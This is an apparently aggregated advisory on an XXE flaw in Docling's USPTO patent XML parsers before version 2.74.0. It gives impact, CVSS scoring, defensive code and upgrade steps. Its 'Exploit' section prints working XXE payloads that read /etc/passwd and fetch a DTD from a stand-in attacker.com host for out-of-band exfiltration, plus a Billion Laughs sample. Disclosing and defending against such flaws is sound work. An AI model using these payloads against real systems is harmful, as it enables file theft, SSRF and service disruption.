The United States Patent and Trademark Office (USPTO) patent XML parser within Docling prior to version 2.74.0 was vulnerable to XML External Entity (XXE) injection due to an insecure default configuration. The parsing mechanism relied on the standard `xml.sax.parseString()` function, which processes XML documents without disabling the resolution of external entities. An attacker who can supply a malicious USPTO patent XML file to the parser can leverage this weakness to force the application to resolve arbitrary external entities defined in the XML’s Document Type Definition (DTD). This is possible because the parser’s default settings allow both external general entities and external parameter entities to be fetched and expanded during document processing.
Exploitation begins when the attacker crafts an XML payload containing a DTD that declares an external entity pointing to a sensitive resource, such as a local file on the server’s filesystem or an internal network endpoint. When the vulnerable Docling component parses this XML, the underlying XML processor follows the entity declaration and retrieves the resource. The resource’s content is then substituted into the parsed document, and if that output is returned to the attacker, the result is arbitrary file disclosure. If the entity instead references an internal service (e.g., `http://169.254.169.254/latest/meta-data/`), the server makes an HTTP request to that address on the attacker’s behalf, resulting in Server-Side Request Forgery (SSRF). Finally, because the same parser configuration does not restrict entity expansion, deeply nested entity definitions can be abused to exhaust memory and CPU in a denial-of-service (Billion Laughs) attack.
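The cost of the Billion Laughs case can be estimated without expanding anything. The sketch below uses a hypothetical helper, `expanded_length` (not part of Docling or any XML library), that walks simple internal entity definitions and sums their expanded lengths with memoization. It assumes entity values contain only literal text and `&name;` references.

```python
import re

# Matches a general entity reference such as "&lol;" inside an entity value.
ENTITY_REF = re.compile(r"&(\w+);")


def expanded_length(name, defs, memo=None, active=None):
    """Length of entity `name` after full expansion, computed without building it.

    Hypothetical helper: `defs` maps entity names to replacement text that
    contains only literal characters and &name; references.
    """
    memo = {} if memo is None else memo
    active = set() if active is None else active
    if name in memo:
        return memo[name]
    if name in active:
        # XML forbids an entity from referring to itself, directly or indirectly.
        raise ValueError(f"recursive entity reference: {name}")
    active.add(name)
    text = defs[name]
    literal = len(ENTITY_REF.sub("", text))
    nested = sum(expanded_length(ref, defs, memo, active) for ref in ENTITY_REF.findall(text))
    active.discard(name)
    memo[name] = literal + nested
    return memo[name]


def billion_laughs_defs(levels=9, fanout=10):
    """Classic shape: lol1 holds `fanout` copies of &lol;, lolN holds `fanout` copies of &lol(N-1);."""
    defs = {"lol": "lol"}
    prev = "lol"
    for i in range(1, levels + 1):
        defs[f"lol{i}"] = f"&{prev};" * fanout
        prev = f"lol{i}"
    return defs


if __name__ == "__main__":
    print(expanded_length("lol9", billion_laughs_defs()))  # 3000000000
```

Nine levels of tenfold fan-out turn a DTD of well under a kilobyte into 3 × 10^9 characters (roughly 3 GB of ASCII text), which is why `defusedxml` rejects entity declarations by default.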
The vulnerable code paths exist in three USPTO patent format parsers: ICE (v4.x), Grant v2.5, and Application v1.x, all of which share the same insecure `xml.sax.parseString()` implementation. The flaw was addressed in version 2.74.0 by replacing the stock SAX parser with a hardened equivalent from the `defusedxml` library, which enforces secure settings that block external entity resolution while still accommodating the DTD declarations required for valid USPTO patent files.
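The general shape of this kind of fix can be sketched as follows. This is not Docling’s actual code: `TextCollector`, `parse_patent`, and `is_rejected` are hypothetical names. The example relies only on `defusedxml.sax.parseString`, which takes bytes plus a SAX content handler and, with its default settings, allows a DOCTYPE but raises a `defusedxml.DefusedXmlException` subclass when it meets entity declarations or external references. How Docling tunes these options for real USPTO files is not shown here.

```python
import xml.sax

import defusedxml
import defusedxml.sax


class TextCollector(xml.sax.ContentHandler):
    """Hypothetical stand-in for a USPTO patent handler: collects character data."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_patent(xml_bytes):
    """Parse with defusedxml's SAX front end instead of xml.sax.parseString.

    defusedxml.sax.parseString expects bytes; by default it forbids entity
    declarations and external references but still accepts a DOCTYPE.
    """
    handler = TextCollector()
    defusedxml.sax.parseString(xml_bytes, handler)
    return "".join(handler.chunks)


def is_rejected(xml_bytes):
    """True if defusedxml refuses the document (entity declaration or external reference)."""
    try:
        parse_patent(xml_bytes)
    except defusedxml.DefusedXmlException:
        return True
    return False


if __name__ == "__main__":
    benign = b"<patent_document><application>A widget</application></patent_document>"
    xxe = (b'<?xml version="1.0"?><!DOCTYPE patent [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
           b"<patent_document>&xxe;</patent_document>")
    print(parse_patent(benign))  # A widget
    print(is_rejected(xxe))  # True
```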
<h2 style="color: blue;">DailyCVE Form:</h2>
Platform: Docling parser
Version: < 2.74.0
Vulnerability: XXE injection
Severity: High (7.5)
Date: 2026-06-03
<h2 style="color: blue;">Prediction: 2026-06-02</h2>
<h2 style="color: blue;">What Undercode Says:</h2>
Vulnerable component: docling < 2.74.0
Attack vector: Malicious USPTO XML
Exploit prerequisites: Ability to submit XML
CVSS base: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
Potential impact: Arbitrary file read
Primary risk: SSRF, DoS, data leak
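The 7.5 base score follows from the CVSS v3.1 base-score equations published by FIRST. The sketch below is a minimal calculator for this vector format (`base_score` and `roundup` are hypothetical helpers, not an official FIRST library); it covers base metrics only and assumes every base metric appears in the vector string.

```python
import math

# CVSS v3.1 base-metric weights from the FIRST specification.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value):
    """CVSS v3.1 Roundup: smallest one-decimal number >= value, avoiding float noise."""
    scaled = int(round(value * 100000))
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Base score for a vector such as 'AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'.

    A leading 'CVSS:3.1/' prefix is tolerated because unknown keys are ignored.
    """
    m = dict(part.split(":") for part in vector.split("/"))
    changed = m["S"] == "C"
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * pr * UI[m["UI"]]
    if impact <= 0:
        return 0.0
    if changed:
        return roundup(min(1.08 * (impact + exploitability), 10))
    return roundup(min(impact + exploitability, 10))


if __name__ == "__main__":
    print(base_score("AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"))  # 7.5
```

For this vector, ISS = 0.56, Impact = 6.42 × 0.56 ≈ 3.595, Exploitability = 8.22 × 0.85 × 0.77 × 0.85 × 0.85 ≈ 3.887, and Roundup(7.482) = 7.5. Because only confidentiality is rated High, the score does not reflect the DoS risk listed above.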
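```bash
# Check installed version
pip show docling | grep Version

# Upgrade to patched version (quote the specifier so the shell does not treat ">" as a redirect)
pip install --upgrade "docling>=2.74.0"

# Verify secure configuration: confirm defusedxml is importable and print whether
# its SAX parser processes external general entities (a falsy value means disabled)
python -c "from defusedxml.sax import make_parser; parser = make_parser(); print(parser.getFeature('http://xml.org/sax/features/external-general-entities'))"
```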
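The same version check can be run from Python, for example in a CI job. This is a sketch: `release_tuple`, `is_patched`, and `installed_docling_is_patched` are hypothetical helpers, and the comparison only looks at the leading numeric release segment, so a pre-release such as `2.74.0rc1` would be treated as patched. `packaging.version.Version` is the better choice when that package is available.

```python
from importlib.metadata import PackageNotFoundError, version

PATCHED_RELEASE = (2, 74, 0)  # first Docling release with the defusedxml-based parser


def release_tuple(ver):
    """Leading numeric release segment, e.g. '2.74.0' -> (2, 74, 0)."""
    parts = []
    for piece in ver.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break
        parts.append(int(digits))
        if len(digits) != len(piece):
            break  # stop at suffixes such as 'rc1' or '+local'
    return tuple(parts)


def is_patched(ver):
    """True if `ver` is at or above 2.74.0 (release segment only)."""
    release = release_tuple(ver)
    release += (0,) * (len(PATCHED_RELEASE) - len(release))  # treat '3' as (3, 0, 0)
    return release >= PATCHED_RELEASE


def installed_docling_is_patched():
    """None if docling is not installed, otherwise whether it is >= 2.74.0."""
    try:
        return is_patched(version("docling"))
    except PackageNotFoundError:
        return None


if __name__ == "__main__":
    print(installed_docling_is_patched())
```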
<h2 style="color: blue;">Exploit:</h2>
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE patent [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<patent_document>
  <application>&xxe;</application>
</patent_document>
```
```xml
<?xml version="1.0"?>
<!DOCTYPE patent [
  <!ENTITY % payload SYSTEM "http://attacker.com/xxe.dtd">
  %payload;
  <!-- the "send" entity is declared in the attacker-hosted xxe.dtd -->
]>
<patent_document>&send;</patent_document>
```
```xml
<?xml version="1.0"?>
<!DOCTYPE patent [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;">
]>
<patent_document>&lol3;</patent_document>
```
<h2 style="color: blue;">Protection:</h2>
- Upgrade to Docling version 2.74.0 or later.
- Use `defusedxml` in place of the standard library XML parsers.
- Reject external entities in SAX parser configurations.
- Validate and sanitize all incoming USPTO XML files.
- Enforce strict memory and CPU limits on parsing.
- Monitor for outbound HTTP requests from patent services.
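Where the standard library SAX parser cannot be swapped out immediately, external entity processing can at least be switched off explicitly instead of relying on defaults. The sketch below uses only `xml.sax.make_parser` and the standard `feature_external_ges` / `feature_external_pes` flags; `TextCollector`, `make_hardened_parser`, and `parse_text` are hypothetical names. It does not limit internal entity expansion, so it complements rather than replaces `defusedxml`.

```python
import io
import xml.sax
from xml.sax.handler import feature_external_ges, feature_external_pes


class TextCollector(xml.sax.ContentHandler):
    """Collects character data so the parsed text can be inspected."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def make_hardened_parser(handler):
    """Stdlib SAX reader with external entity processing explicitly turned off."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)  # do not fetch external general entities
    parser.setFeature(feature_external_pes, False)  # do not fetch external parameter entities
    parser.setContentHandler(handler)
    return parser


def parse_text(xml_bytes):
    """Parse `xml_bytes` with the hardened reader and return its character data."""
    handler = TextCollector()
    make_hardened_parser(handler).parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)
```

With these flags, a reference such as `&xxe;` to a `file://` entity is skipped rather than replaced with the file’s contents.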
<h2 style="color: blue;">Impact:</h2>
- Arbitrary File Read: Attackers can read sensitive files (e.g., `/etc/passwd`, configuration files, source code) from the server’s filesystem by declaring external entities that point to local files.
- Server-Side Request Forgery (SSRF): An attacker can force the server to make arbitrary HTTP requests to internal systems, potentially exposing cloud metadata endpoints or internal APIs, or enabling internal port scans.
- Denial of Service (DoS): The “Billion Laughs” attack uses deeply nested entity expansions to rapidly exhaust memory and CPU, causing the application to crash or become unresponsive.
- Widespread Exposure: The vulnerability is present in three separate USPTO patent format parsers (ICE v4.x, Grant v2.5, Application v1.x) within the same codebase, increasing the attack surface across multiple document processing pipelines.
Sources:
Reported By: github.com
Extra Source Hub: Undercode

